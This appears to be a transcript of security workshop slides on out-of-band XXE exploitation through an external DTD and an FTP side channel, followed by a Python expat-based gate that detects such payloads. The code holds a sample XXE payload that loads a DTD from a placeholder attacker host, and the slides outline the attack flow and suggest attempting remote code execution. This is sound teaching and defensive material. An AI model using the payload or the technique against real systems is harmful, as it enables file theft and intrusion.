TRANSCRIPT
Advanced XXE Exploitation. Exercise 2: External DTD (App port 8022)
Philippe Arteau, GoSecure / Countertack
19/06/2019. Slides: http://bit.ly/xxeparis
Direct response from XXE
Not ideal: in some cases, you might get no response at all.
Side-Channel XXE with external DTD
Flow: XML payload -> request for the DTD (hosted over HTTP) -> request to the FTP service
Pieces: XML payload, DTD host over HTTP, FTP service
Edit FTP to have something unique
In a real test, you should try the common outbound ports: 443, 80, 21.
1. Send XML payload
2. DTD is loaded!
3. FTP URL is evaluated!
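A defender-side gate for the three steps above, added here as an example and not taken from the slides: it uses Python's stdlib expat parser, which never performs network fetches itself, only to report DOCTYPE and entity declarations, and rejects any document that asks for an external DTD or declares an entity with a SYSTEM or PUBLIC id. The DTD host name in the constructed sample is a placeholder.

```python
"""Pre-parse gate for XXE external-DTD side channels (added example, not from the slides).

The side channel works because a resolving parser fetches a DTD named in the
document (DOCTYPE SYSTEM id or external parameter entity) and then evaluates
whatever URL that DTD builds. Expat is used here only to report declarations.
"""
from xml.parsers import expat


def xxe_findings(xml_bytes: bytes) -> list[str]:
    """Return the reasons the document should be rejected (empty list = accept)."""
    findings: list[str] = []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # <!DOCTYPE x SYSTEM "..."> makes a resolving parser fetch an external DTD.
        if system_id or public_id:
            findings.append(f"external DTD subset: {system_id or public_id}")
        elif has_internal_subset:
            # Strict policy (as in disallow-doctype-decl): no DOCTYPE at all.
            findings.append("internal DTD subset present")

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # SYSTEM/PUBLIC entities mean an out-of-process fetch; parameter
        # entities (% name) are the building block of the external-DTD trick.
        kind = "parameter" if is_param else "general"
        if system_id or public_id:
            findings.append(f"external {kind} entity {name!r} -> {system_id or public_id}")
        elif is_param:
            findings.append(f"internal parameter entity {name!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as exc:
        findings.append(f"parse error: {exc}")  # malformed input is rejected too
    return findings


def is_safe(xml_bytes: bytes) -> bool:
    return not xxe_findings(xml_bytes)


# Constructed samples; the DTD host name is a placeholder, not one from the slides.
BENIGN = b'<?xml version="1.0"?><order><id>42</id></order>'
SIDE_CHANNEL = (b'<?xml version="1.0"?><!DOCTYPE order [ '
                b'<!ENTITY % dtd SYSTEM "http://dtd-host.example/payload.dtd"> ]>'
                b'<order><id>42</id></order>')
```

Run the gate before handing the bytes to the real XML parser; the findings list doubles as the detection event to log.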
Putting the pieces together
Using repeater efficiently with HackVertor
Using the fake FTP server interactively
Bonus: try to get RCE on the server
Questions?
[email protected] /blog/ @h3xStream @GoSecure_Inc